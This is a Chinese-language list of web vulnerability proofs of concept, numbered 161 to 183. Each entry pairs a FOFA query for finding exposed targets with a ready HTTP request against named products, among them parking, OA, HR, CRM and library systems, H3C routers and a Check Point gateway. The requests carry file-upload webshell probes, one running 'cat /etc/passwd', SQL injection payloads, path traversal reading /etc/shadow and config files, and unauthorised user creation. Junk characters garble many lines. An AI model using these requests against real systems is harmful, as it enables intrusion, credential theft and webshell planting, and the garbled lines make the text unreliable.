Accept-Language: en
( I6 [& J  m9 ?0 RAccept-Encoding: gzip( c5 C" H$ z1 L# i4 [. o. t! f+ Q
2 X' c! B. b+ t& {8 S
3 r2 X% Z5 k3 [& g0 Z! w
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
& r5 A2 t# G% eFOFA:body="/KT_Css/qd_defaul.css"
3 I# e# s! `' {& ~, z4 E3 d第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
9 D7 E4 ]4 n' y7 L" O  u, `5 r  vPOST /Webservice.asmx HTTP/1.1, p9 ]/ C. O  t, u
Host: x.x.x.x9 X$ d" k- [( Z' ]0 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.360 y. C6 G; A0 U1 s/ p4 P2 `+ i
Connection: close
7 _6 G2 y1 I, w5 C; ]; e! }Content-Length: 445
  e9 Y0 L% W# n2 `! H, EContent-Type: text/xml
, V5 m6 g( f) O8 |# ^2 pAccept-Encoding: gzip4 R& O3 u1 u% y$ t7 A, o

) ^6 @& H$ l( U+ f<?xml version="1.0" encoding="utf-8"?>
. m6 j7 Z1 c) Y<soap:Envelope xmlns:xsi="
2 r& m1 z4 Q3 q+ ghttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema") T& j. Z! G2 v& G8 }$ g
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">3 X' [4 n. l4 u
<soap:Body>
& @7 B; J3 n2 x7 L/ L, T7 @! }  g1 O<UploadResume xmlns="http://tempuri.org/">
8 v/ f# h+ O+ @. @0 p<ip>1</ip>
: y# _. C% v0 M  N/ v8 o2 D6 S* I+ V<fileName>../../../../dizxdell.aspx</fileName>7 @) C6 s4 n4 F. W! Z& O+ J3 X" r9 ?
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>7 X: H3 Q( i9 \* z2 W6 S
<tag>3</tag>
9 N" ?9 N' |4 a) N1 {' |1 J</UploadResume>1 c3 T* y, M1 H; T# O. Y
</soap:Body>
( l" f, y* W" C  c) D</soap:Envelope>
: V- Q8 E, s, y% g+ T: k+ j/ ~) l: L# b2 C8 G9 A+ y

* B7 x+ u( Q" E0 }0 G+ M  ghttp://x.x.x.x/dizxdell.aspx& D/ {) B( F# K

8 m9 B0 G' q+ M  T* y3 P162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传& c$ B0 D4 k2 _- m
FOFA: app="和丰山海-数字标牌"
1 x  R8 j, e0 |5 DPOST /QH.aspx HTTP/1.1. y) Z5 ], j8 g9 V( y1 Q% f& f
Host: x.x.x.x4 q- ]2 K; h: _1 ?2 {- S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
* ?+ \- p" J  O" V0 i' R- rConnection: close+ a. r: A2 o* I+ H" r
Content-Length: 583
/ s7 B9 D# p+ JContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
9 R  }+ a6 i$ Y% U( h8 aAccept-Encoding: gzip
' n; P( N. G9 Y8 l( v* ]3 J! i) ~7 E2 |
------WebKitFormBoundaryeegvclmyurlotuey
0 D8 R- Y, a. M" wContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
0 z) ?% G" h% a2 _9 c. K$ ZContent-Type: application/octet-stream
. e7 X$ U  S' _% t, c0 `
& w. s7 A$ t0 Z<% response.write("ujidwqfuuqjalgkvrpqy") %>+ q9 P4 u: a( G$ g
------WebKitFormBoundaryeegvclmyurlotuey! `. e, i! X# [
Content-Disposition: form-data; name="action"
4 z- L# e: _# h7 |8 I& ^" y6 [3 T) h8 k' _5 |* U2 c' A. q, z4 j+ W
upload
& l) F7 u; ^) f- P8 e------WebKitFormBoundaryeegvclmyurlotuey6 e- ]4 X/ y& `1 N9 E3 y% W7 h
Content-Disposition: form-data; name="responderId"
$ s9 ]& g! U0 _0 O: a/ K. d3 a, B$ J+ ]( I  Y  z0 D. ]) }3 O
ResourceNewResponder5 ?* r2 [7 R% A  k1 l0 u
------WebKitFormBoundaryeegvclmyurlotuey
# ]& c2 ]5 E3 N) V/ J. I2 zContent-Disposition: form-data; name="remotePath"
! D5 {+ ^2 T6 Z2 b4 d
! P; C2 {  P" L+ \- ?/opt/resources
# ^  p. g2 X& m# P9 ?9 I7 q! \------WebKitFormBoundaryeegvclmyurlotuey--# @0 H; q% u% }  Y8 t9 N, a) |, d

# {( a3 u7 B; f0 b, r7 o  W0 b
9 A" j" O; {9 i2 f; {8 ?4 t, Ghttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
) e  k8 w' Y. I) ~
& F$ `& M' o, G. u5 d: Y163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
( I: Q0 Z+ z; ?7 k2 `: H! }FOFA: icon_hash="-795291075"
" H# @, R, Z- gPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1- c& S. ~. s( D3 W0 W; t- |4 y
Host: x.x.x.x% j/ Y0 R  G5 z( L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36) v) h! c0 Q! p6 d) n; w
Connection: close
) L; C+ J! r( s+ y3 YContent-Length: 293
& W& j* q8 k1 u$ jAccept: */*9 k; R. L' v* j, g  O; T
Accept-Encoding: gzip, deflate
: V- G& b$ r: S& dAccept-Language: zh-CN,zh;q=0.9
% x3 o' p' }; U* B" JContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod* j0 e9 g) C8 X
6 I( J# h4 B( @- }
------iiqvnofupvhdyrcoqyuujyetjvqgocod) P. ^% w; R3 K; i& E
Content-Disposition: form-data; name="name"
7 Y+ u: N, J. |% Y9 M( z% t; t0 R  h% @3 `7 |: V6 d
1.php
8 T. ~& K2 j/ G; x------iiqvnofupvhdyrcoqyuujyetjvqgocod
+ j7 T; Z8 t' I8 U4 O, nContent-Disposition: form-data; name="upfile"; filename="1.php"
! s9 ?3 T  a# h* M& |3 M- wContent-Type: image/jpeg$ Y9 d  V! U, T9 L4 D& Y3 J
4 {; M3 o/ a! k9 }
rvjhvbhwwuooyiioxega
, v1 t8 n" U: {------iiqvnofupvhdyrcoqyuujyetjvqgocod--
6 ]4 Q" n9 j% k7 y# I; R2 @; e+ r! l

# W% _) F7 Z* i" Q4 d* g/ q/ x3 I164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传* I( K% r4 ^& |2 n4 h7 `2 f
FOFA: title="智慧综合管理平台登入"! y/ {2 ~" q2 k
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1& h) U7 H$ H/ u3 g. n4 D
Host: x.x.x.x
! H  X& B& l, X+ ~. B) YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' B) ^& s( M5 I4 g* w3 M( T# T% X
Content-Length: 2884 a' H; w7 E$ K+ d* k; H. W
Accept: application/json, text/javascript, */*; q=0.01
1 O( H) K5 z7 i7 W* y# ~* XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
- o! H" ]$ H% j5 Q& ?8 I! f& _Connection: close5 F' t( {3 R7 T. n! e4 Z
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
! R; u- T# w: k9 ^: j' a2 J5 mX-Requested-With: XMLHttpRequest  J6 F* I% z* S+ j* D+ r! t
Accept-Encoding: gzip
, \! o4 ~1 r- m/ b
! h3 o9 @1 z1 U. R) z) ]------dqdaieopnozbkapjacdbdthlvtlyl+ a5 B) B0 _$ ^; q( x
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
$ ]+ I/ Y1 @! nContent-Type: image/jpeg
& ?% i% d9 a; h# a
9 p# L2 e& `9 L<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
% P) d& R. j% z3 X8 `------dqdaieopnozbkapjacdbdthlvtlyl--
5 k% a4 g5 ~* c/ b5 M
" |- {2 C/ w, p$ v: H( {
9 h0 Q$ ^) e4 P* \http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx. {5 s' z* h( N1 p0 V0 {' k8 \

+ m# Q* Z, z' h7 \( N5 D7 @165. OrangeHRM 3.3.3 SQL 注入
: g: @' v  m: S1 M. q2 z2 ?CVE-2024-36428
) K9 y% m+ n9 t1 zFOFA: app="OrangeHRM-产品"% p3 k6 H+ H5 N0 f/ n- Y
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))* I0 {6 O+ H7 K" j- d

3 Y/ d( _5 q/ d7 P; C7 M( _; N( ^; R) }  w# i" C( Y% I& T
166. 中成科信票务管理平台SeatMapHandler SQL注入# ]$ f3 \8 R7 S* [1 t7 d8 N
FOFA:body="技术支持:北京中成科信科技发展有限公司"
* ?+ D# `& x7 W) k1 a8 lPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.11 g; P' [  b( e5 P. x2 |, L1 {
Host:4 m, I9 [1 p- T3 C" S6 A$ }
Pragma: no-cache
. e& t9 m7 l$ r2 ]7 a5 A2 U6 \Cache-Control: no-cache
8 K9 A% d5 k- V! bUpgrade-Insecure-Requests: 1, q7 f1 {) z$ s, K5 n% ]4 G/ \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36( g" [. `( D) o/ R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 G% j) i$ A  k5 [3 GAccept-Encoding: gzip, deflate
: C/ x- f6 _- [6 [3 DAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
: x- q& x0 z' z3 A; d! eCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
; K, X2 ]3 _# N- h7 o& yConnection: close: K$ }7 r! d$ f5 s2 u8 e! m
Content-Type: application/x-www-form-urlencoded
2 h7 n: b6 R4 l( gContent-Length: 89
. F+ g0 t- t8 n) p$ r- [8 T( ~3 E) g" \8 e. [0 ^9 T: r
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
9 N+ @5 o+ B' s% a' Q
3 k+ s/ i4 D& M2 r7 {4 s: G5 A: u; N5 i8 i- w
167. 精益价值管理系统 DownLoad.aspx任意文件读取3 q( m# R1 I% d  I
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
/ z0 P/ X! V1 l& H  @0 kGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
8 s0 W& t6 I, x, wHost:
/ z% t# A! z( ^0 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: R7 f. P) H0 [' \, h, m7 xContent-Type: application/x-www-form-urlencoded; m7 C& C- k# P% o' Z/ t/ M
Accept-Encoding: gzip, deflate
0 l& h1 s7 G/ I: ^9 W/ F6 }Accept: */** Z2 |8 m3 P. O" v5 V& Y
Connection: keep-alive" E  e, W3 n, I  `1 f: Q

; M; R+ U) J( d: ?; x( o
) s% l3 X% G/ ^168. 宏景EHR OutputCode 任意文件读取1 e* l1 r) \0 G6 z5 _2 E1 q  e
FOFA:app="HJSOFT-HCM". H* m  {! F3 L. }3 W+ j1 [8 W
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
) v4 ~; I2 T0 i* {2 Y* ]Host: your-ip
; I# e5 b2 U8 u* D3 Z+ ]1 Q" xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36: G" s  l$ C8 `7 _
Content-Type: application/x-www-form-urlencoded6 {  B& }7 W, ?
Connection: close
/ _* f$ R& R$ u
7 ~8 Y$ d8 @+ o! Y8 J3 y6 Q7 n
: o; K6 m8 |( @( M1 _+ [3 d& U% }1 A2 d7 R+ E
169. 宏景EHR downlawbase SQL注入
& i7 u2 @2 B' B) @FOFA:app="HJSOFT-HCM"; l, ^% Y8 o0 l; f
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
  `, m6 @1 `4 ]/ mHost: your-ip. R4 O1 p7 G( N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 Q6 Z7 a  m. wAccept: */*
" b  ~3 }  l9 M# G* }Accept-Encoding: gzip, deflate6 z0 F9 r' N0 E- r; C  y
Connection: close( u; W0 t! ]8 F5 ?$ |4 z0 B2 l

& f. F+ c; i* B5 _& D7 e" G" U8 Y
- H) j3 I$ _2 `7 ]5 t/ p" c1 d$ e2 ~9 P* k- U& F- V9 c9 i3 L
170. 宏景EHR DisplayExcelCustomReport 任意文件读取" V+ i! d$ \) g7 C, F# s
FOFA:body="/general/sys/hjaxmanage.js"
" u% z' D* o) v. t2 _  F& yPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
- l! X: F! }- vHost: balalanengliang
6 ?1 g9 S2 \2 D5 XUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, y# t: D. \2 w4 K
Content-Type: application/x-www-form-urlencoded
2 O, Y0 e% S+ ~& L& ~
: p9 s6 D/ }0 e' j: vfilename=../webapps/ROOT/WEB-INF/web.xml: X# R! Y- ^" H0 ?( `. [6 i- w6 Y2 n4 R6 j

# k7 N* n: F4 T" }( Z) E/ P0 V
6 u" m5 D6 n- Q6 K, X# }! x2 o171. 通天星CMSV6车载定位监控平台 SQL注入* p& H  G' g$ n9 v* K
FOFA:body="/808gps/"1 [8 k0 Y- v. C+ H$ F
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.16 e! }! ^9 R4 ?% B  t- n9 Z
Host: your-ip
$ Z4 v' D/ _0 d& oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
, p( Z+ g. v* [4 d; d: uAccept: */*
0 j, r' [/ `% K; d- X1 nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 B8 X  m# j. K( B$ q/ v: H) ]
Accept-Encoding: gzip, deflate( Q' }, ~1 x; r, l: ?4 A  K
Connection: close0 K3 {; q; k9 c2 j
, P/ J% \7 y$ L9 v2 N

5 E: z# a: @( p0 P' T; T# ?2 O: y  T) u# g5 p3 t& U
172. DT-高清车牌识别摄像机任意文件读取% p% G8 Z" E5 I& h  V/ B
FOFA:app="DT-高清车牌识别摄像机"
/ j( P- Q  L  w: Y2 \  R& z" L$ ]. vGET /../../../../etc/passwd HTTP/1.1
; ^5 L# F  H3 e) @+ l, x$ bHost: your-ip& D# _, l& k7 \( [# ~, y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, p$ }( b5 h( {5 A6 SAccept-Encoding: gzip, deflate( [/ {. M% I( {9 ]/ Q
Accept: */*
1 ?! `$ [% m; Z2 @' h0 T# G/ eConnection: keep-alive* o% E$ t' a9 Y6 ?
8 H+ r: t7 k2 h  M; H# M6 C4 e$ J

7 }  i5 T0 ]2 T7 V) @  L
% j. t/ z; i$ j  [5 a: V173. Check Point 安全网关任意文件读取
6 C* H! l1 i$ qCVE-2024-24919
# A4 N+ T" f* A) V3 A0 I0 j" @FOFA:app="Check_Point-SSL-Network-Extender"
, S  H  Y0 a+ Y+ ^5 W( TPOST /clients/MyCRL HTTP/1.1! B1 k' M3 V  }; k! ]6 H
Host: your-ip" a+ f# N( t$ Y# H
Content-Type: application/x-www-form-urlencoded
( s* P/ J, N# F8 V
9 I, J' g- E5 `$ zaCSHELL/../../../../../../../etc/shadow8 A6 s% U$ C: L1 @
* I/ ]% U: {2 a! r4 p7 g+ T, K
3 Q% y( R! D% ~7 Z* T2 ]

! ~' E& i0 O  [' L# J  D174. 金和OA C6 FileDownLoad.aspx 任意文件读取
% D8 y4 {" p8 u) gFOFA:app="金和网络-金和OA"6 ~' R& L- D  s' X
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
1 T, Q' w$ X- d8 I# oHost: your-ip/ g2 E3 i' g9 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
2 c) Z5 I5 n2 h! E1 OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% Q1 k5 H) ~+ x- ^& a5 \" EAccept-Encoding: gzip, deflate, br
0 j, M/ X# c) D$ @; c9 F4 F: ?Accept-Language: zh-CN,zh;q=0.9
7 \! k( q+ l. D% G" RConnection: close2 w" o: }+ h* ~/ Y

8 u2 G0 V1 ~/ c/ e8 }$ H6 w8 U
1 T- f' a6 P4 d- S+ \5 Z- ?6 l1 E: t1 Y; M* K  F2 Z+ V
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入* g" }" t% U7 c$ U
FOFA:app="金和网络-金和OA"4 ], H6 v3 @% x$ E7 H* P
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
  q0 q6 _1 j& v1 t  VHost:# o7 S. R3 Q- w  }$ ?! _# ]
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
) e0 @6 e' `" g, a) rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 b. X+ t2 C/ V; G9 Q! LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; x9 Z3 Z" j5 }0 X8 J
Accept-Encoding: gzip, deflate
" B+ Z- Q$ l5 |3 e8 V/ }" |& iConnection: close
8 v6 m, _; J8 P% _Upgrade-Insecure-Requests: 17 }, @& W- F1 H/ E: Q

" I' Q2 _& C  t9 I! V
5 W" H8 k5 g! u- e176. 电信网关配置管理系统 rewrite.php 文件上传
$ P* n) k1 I* s* k, YFOFA:body="img/login_bg3.png" && body="系统登录"
6 I0 m) o; l: U' E: p/ e0 `; XPOST /manager/teletext/material/rewrite.php HTTP/1.1
9 }# J3 y5 {; G2 g* s: IHost: your-ip
4 |2 g2 V3 R- l' ~5 o0 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
/ B( w9 A+ e  k* a% rContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
" k5 v4 k8 @% w( I. D+ d, EConnection: close
( y1 t& d, [: p: G9 Q! f0 V9 u8 Y; O) `# g, r4 w
------WebKitFormBoundaryOKldnDPT
/ Z/ x% a+ O6 b7 _: L5 _4 ZContent-Disposition: form-data; name="tmp_name"; filename="test.php"
2 {. M0 A5 c& WContent-Type: image/png
* a  F) }. N  x5 Y6 |5 u
0 I( v% i" l( F7 k% @8 ?  H<?php system("cat /etc/passwd");unlink(__FILE__);?>6 X- j6 z+ r) Q6 U7 j4 b
------WebKitFormBoundaryOKldnDPT5 _7 u6 ]; c- A4 U; m
Content-Disposition: form-data; name="uploadtime"
8 ?9 R: Q/ g% t* a; e1 Y9 E, \ ' P& ~9 N5 y# B
$ s% v* E/ G6 d
------WebKitFormBoundaryOKldnDPT--- O/ Z( c0 E3 V6 F3 I) x9 i1 I
9 a+ H; [) M; O

1 @; @: k' P$ ?' [+ S) Q! x, X0 \* j: `9 M
177. H3C路由器敏感信息泄露
6 b% e) _/ c! N- J2 d% G9 H- F& w/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg* G/ D7 u: e; y; K2 U4 T( M+ o
/userLogin.asp/../actionpolicy_status/../M60.cfg
. {& F- F; c+ D4 w/userLogin.asp/../actionpolicy_status/../GR8300.cfg
8 ~6 h# i' ?' t9 t$ k/userLogin.asp/../actionpolicy_status/../GR5200.cfg
: O1 o* p, ?  b& ^( o! M# O: f( H/userLogin.asp/../actionpolicy_status/../GR3200.cfg
! \3 l9 ]1 r+ I/userLogin.asp/../actionpolicy_status/../GR2200.cfg
! D7 h7 ?' ?& _, ]/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
, P: H7 ^/ L/ F- s0 z& I/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
8 I; d. x4 j& s! i0 e/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
6 r7 N) z+ w: @& J1 S; f. Y, ]2 S/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
% E3 V, N  N# I0 X/userLogin.asp/../actionpolicy_status/../ER5200.cfg
. ]! Z: y# T9 \+ |/userLogin.asp/../actionpolicy_status/../ER5100.cfg
- k! w5 I1 ]  W' {' n; y, L/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
% C9 T+ Q6 Z1 H9 c. }/userLogin.asp/../actionpolicy_status/../ER3260.cfg
4 v7 r: N0 \: ~2 L) }; ]6 J/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg4 ]8 d; W, p* k0 }
/userLogin.asp/../actionpolicy_status/../ER3200.cfg6 d9 U6 v( g- d3 x; I
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
! {! y! I6 D( R. ^" g9 c; S/userLogin.asp/../actionpolicy_status/../ER3108G.cfg- @# t/ |9 b7 I4 G( v9 V. Q/ p2 w
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
3 T: u* c% n; h+ n, T0 }4 @$ K/userLogin.asp/../actionpolicy_status/../ER3100.cfg
  e7 C1 |- z  c, u$ |/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg& t9 h8 ?" I* B+ r1 v

' a) [# ~0 \' ^6 W( l* ]0 E
$ |: H  d1 k& Y- f, W# J4 j178. H3C校园网自助服务系统-flexfileupload-任意文件上传0 Q' ^* |! U7 Q" ?5 ~
FOFA:header="/selfservice"( E! p  \5 N" ~. x$ L
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
+ o0 ?2 r; g! e. bHost:
8 m* ~8 [% Z( w! \, M* X, ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
( d- V- B. S3 s6 [5 C. L5 oContent-Length: 252! P6 ?, G1 ^( |- K* \4 r* o
Accept-Encoding: gzip, deflate
/ F: ]9 j. k0 G6 w/ R' ^( {4 HConnection: close) ?/ b# ~+ k; `; S9 L& {2 F* j
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l- h; w( Q1 B/ \- z% ~5 y7 \
-----------------aqutkea7vvanpqy3rh2l
' `+ m# U5 H5 sContent-Disposition: form-data; name="12234.txt"; filename="12234"+ r+ \6 z# n7 }2 b* K
Content-Type: application/octet-stream
9 }3 {1 Z+ K4 p0 R) N4 lContent-Length: 255  B, G2 H2 ~: C% l7 t
2 R" P' l* i2 @+ ]/ h
12234$ e# [! @1 I" A4 z! U
-----------------aqutkea7vvanpqy3rh2l--% l- e- M/ c4 r' z" ]

4 a2 F, H# ?& x
6 P7 i& ]. i( E; \! E1 KGET /imc/primepush/%2e%2e/flex/12234.txt
4 d$ q  j# z; U5 U+ L& L/ \( @- U5 d5 D

! Q( I/ `9 i2 K: P% z9 m2 a179. 建文工程管理系统存在任意文件读取4 g& n+ |& O( z
POST /Common/DownLoad2.aspx HTTP/1.1
" p/ J, ^: R, H- RHost: {{Hostname}}
6 x) [3 u: ^+ C0 S0 S% e3 vContent-Type: application/x-www-form-urlencoded4 L& I4 f3 u8 |
User-Agent: Mozilla/5.0: W. |" q& P6 S+ H7 ?& k' s0 k
8 K; P7 h. S5 T" _
path=../log4net.config&Name=, }% w3 e' `; d

8 w" |/ W0 P! T8 s; Q& `1 r% w
' `( C0 H. m' ~; q/ _2 c# E180. 帮管客 CRM jiliyu SQL注入
) G# y( f& U1 VFOFA:app="帮管客-CRM"
2 [! k( {9 X3 U4 V" hGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
) L9 V! L, d9 _Host: your-ip9 e) m8 g& w; g# K/ S" x2 g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
, ^8 A' x7 ~3 _3 C0 I4 QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 m' l6 B1 M9 _  b
Accept-Encoding: gzip, deflate* N, j% }+ o! b# j% z0 H
Accept-Language: zh-CN,zh;q=0.9* Q$ D3 T) _( u4 V* P
Connection: close2 h) N8 y  r7 U# m! l3 ~5 @9 F
% d% M' V/ ^" S# d. a: _6 \

" p' L" D' X# v) U1 A181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入" _  K) R5 c" L5 @
FOFA:"PDCA/js/_publicCom.js"
  N- W9 M; q8 \0 L# GPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.16 k% R8 `, w) S; w$ ]: Y
Host: your-ip: c  \2 _. B& O# P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
0 n8 P' S- N: s, kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* C' s$ }4 w6 CAccept-Encoding: gzip, deflate, br
, T1 L" U. u" q7 X* y! k' vAccept-Language: zh-CN,zh;q=0.9
  J/ u; m9 J- `  i& ]Connection: close5 `- Q$ T! T+ q7 e& h
Content-Type: application/x-www-form-urlencoded
: C7 _0 ^# F1 L! q% l8 i' l* _( L  X* b. C2 g2 Y

" ?1 S4 z5 ~7 D) H: A" m/ Qaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=205 b# l3 w: a5 |

1 g- ]. }) T( z  Y$ g4 y0 k( _2 H/ D7 w  v* `
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建; R# [- k4 w  I' {6 r
FOFA:"PDCA/js/_publicCom.js"
: q' @" s/ k0 q, G! oPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
* T% R" P9 a, ^5 i6 k- {1 HHost: your-ip" G% l6 L$ `6 [( b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36- y/ {  \" e0 E3 g! N3 H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% G9 s" j, f$ }: i  d% B, w
Accept-Encoding: gzip, deflate, br
  F" q* k. |2 D. oAccept-Language: zh-CN,zh;q=0.9$ |6 e: ~5 i! [' q% |; w
Connection: close
5 I, ]) {$ o# ]6 Z6 |- s  tContent-Type: application/x-www-form-urlencoded. R  Y& W8 K7 [2 s( u+ K; i4 q9 Q* ]" M! B
( x* _- {  g2 H1 {" G. X
$ j0 Q9 |3 ?( g$ |: p5 h% J
username=test1234&pwd=test1234&savedays=10 l% m4 n7 ]6 g& \6 `( G1 d

! r7 {5 w( I& F, K" W6 a3 s% [
: ~) e8 c( J/ N7 |4 s183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
( D0 S! E, F# a) u% F! QFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面", d0 e7 m# |8 N7 Q4 k$ _
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1( L6 l7 w- s# s& Z) S/ Z( K1 B
Host: your-ip; t! S4 G; |* u3 g  I
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
! {: X6 m6 i, w  |Accept-Charset: utf-8
